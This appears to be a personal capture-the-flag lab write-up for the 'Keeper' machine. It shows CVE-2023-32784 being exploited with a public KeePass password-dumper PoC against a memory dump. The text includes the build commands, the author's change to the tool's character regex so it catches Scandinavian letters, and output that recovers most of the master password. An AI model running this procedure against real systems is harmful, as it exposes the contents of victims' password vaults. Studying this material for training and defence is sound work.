CVE-2023-32784

a vulnerability was found in keepass. It has been classified as problematic. Affected is an unknown function in the library pagefile.sys of the component API. The manipulation with an unknown input leads to a missing encryption vulnerability. CWE is classifying the issue as CWE-311. The software does not encrypt sensitive or critical information before storage or transmission. This is going to have an impact on confidentiality.

The target instance of KeePass might be vulnerable as it showed 2.x when attempted to check the DB file

Exploit

I found a PoC online

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/keeper]
└─$ git clone https://github.com/vdohney/keepass-password-dumper.git ; cd keepass-password-dumper
Cloning into 'keepass-password-dumper'...
remote: Enumerating objects: 107, done.
remote: Counting objects: 100% (107/107), done.
remote: Compressing objects: 100% (75/75), done.
remote: Total 107 (delta 59), reused 68 (delta 28), pack-reused 0
receiving objects: 100% (107/107), 198.73 KiB | 3.61 MiB/s, done.
resolving deltas: 100% (59/59), done.

Downloading the exploit PoC to Kali

┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
  Determining projects to restore...
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.targetframeworkinference.targets(144,5): error NETSDK1045: The current .NET SDK does not support targeting .NET 7.0.  Either target .NET 6.0 or lower, or use a version of the .NET SDK that supports .NET 7.0. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]

Initial cross-compilation attempt fails as I don’t have the SDK for .NET 7.0 That’s okay. I could just resort to .NET 6.0

Changing the target framework to .NET 6.0 in the keeppass_password_dumper.csproj file

┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
  Determining projects to restore...
  Restored /home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj (in 115 ms).
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.sdk.targets(1114,5): warning NETSDK1179: One of '--self-contained' or '--no-self-contained' options are required when '--runtime' is used. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]
  keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/keepass_password_dumper.dll
  keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/publish/

Compiled sucessfully dotnet issues a warning that I didn’t provide a parameter for runtime, but that won’t be an issue

Scandinavian Characters

┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ bin/Release/net6.0/linux-x64/publish/keepass_password_dumper ../KeePassDumpFull.dmp
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●d
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●g
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●r
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●d
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●● 
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●m
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●e
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●d
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●● 
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●f
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●l
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●d
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
Found: ●●●●●●●●●●●●●●●●e
 
[...REDACTED...]
 
Password candidates (character positions):
Unknown characters are displayed as "●"
1.:	●
2.:	,, l, `, -, ', ], A, I, :, =, _, c, M, 
3.:	d, 
4.:	g, 
5.:	r, 
6.:	●
7.:	d, 
8.:	 , 
9.:	m, 
10.:	e, 
11.:	d, 
12.:	 , 
13.:	f, 
14.:	l, 
15.:	●
16.:	d, 
17.:	e, 
Combined: ●{,, l, `, -, ', ], A, I, :, =, _, c, M}dgr●d med fl●de

While the exploit PoC seems to execute and successfully mined the password from the KeePass crash dump, it appears that it missed the first character as well as some others in the middle. Looking back at it, the target organization appeared to located be in Scandinavia as the real name of thelnorgaard user, Lise Nørgaard, suggests Therefore, it is possible that the exploit PoC does not check for those Scandinavian vowel characters, such as ø, ö, or å

Checking the source code of the exploit PoC indeed confirms my theory The range specified in the AllowedChars string, ^[\x20-\x7E]+$, represents ASCII characters. In this range:

\x20 corresponds to the space character.
\x7E corresponds to the tilde character.

I can fix it up by commenting out the previous AllowedChars variable and appended a new one with ^[\x20-\x7E\u00C0-\u00FF]+$;

\x20-\x7E is a Hexcode range that includes the printable ASCII characters as before
\u00C0-\u00FF is a Unicode range that includes the extended Latin-1 characters, which cover many Scandinavian characters

Retry

┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ rm -rf bin ; dotnet publish -c Release -r linux-x64
MSBuild version 17.3.0+92e077650 for .NET
  Determining projects to restore...
  All projects are up-to-date for restore.
/usr/share/dotnet/sdk/6.0.400/sdks/microsoft.net.sdk/targets/microsoft.net.sdk.targets(1114,5): warning NETSDK1179: One of '--self-contained' or '--no-self-contained' options are required when '--runtime' is used. [/home/kali/archive/htb/labs/keeper/keepass-password-dumper/keepass_password_dumper.csproj]
  keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/keepass_password_dumper.dll
  keepass_password_dumper -> /home/kali/archive/htb/labs/keeper/keepass-password-dumper/bin/Release/net6.0/linux-x64/publish/

re-compiling

┌──(kali㉿kali)-[~/…/htb/labs/keeper/keepass-password-dumper]
└─$ bin/Release/net6.0/linux-x64/publish/keepass_password_dumper ../KeePassDumpFull.dmp
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●ø
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●d
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●g
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●r
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●ø
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●d
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●● 
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●m
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●e
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●d
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●● 
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●f
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●l
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●ø
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●d
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
found: ●●●●●●●●●●●●●●●●e
 
[...REDACTED...]
 
password candidates (character positions):
Unknown characters are displayed as "●"
1.:	●
2.:	ø, Ï, ,, l, `, -, ', ], A, I, :, =, _, c, M, 
3.:	d, 
4.:	g, 
5.:	r, 
6.:	ø, 
7.:	d, 
8.:	 , 
9.:	m, 
10.:	e, 
11.:	d, 
12.:	 , 
13.:	f, 
14.:	l, 
15.:	ø, 
16.:	d, 
17.:	e, 
combined: ●{ø, Ï, ,, l, `, -, ', ], A, I, :, =, _, c, M}dgrød med fløde

It indeed works! The exploit PoC prints those Scandinavian vowel characters this time However, the issue still persists as;

the first character is UNKNOWN indicated by ●
the second character is unknown since it shows {ø, ï, ,, l, `, -, ', ], a, i, :, =, _, c, M}
- It could be any one of those

The rest is dgrød med fløde, which appears to be a phrase

There is a mention of the first password character being missed out in the README.md file within the exploit PoC

Solution found. I will continue on in the Privilege Escalation phase

InfoSec LAB

Explorer

Keeper_CVE-2023-32784

CVE-2023-32784

Exploit

Exploitation

Scandinavian Characters

Retry

Interactive Graph View

Table of Contents

Backlinks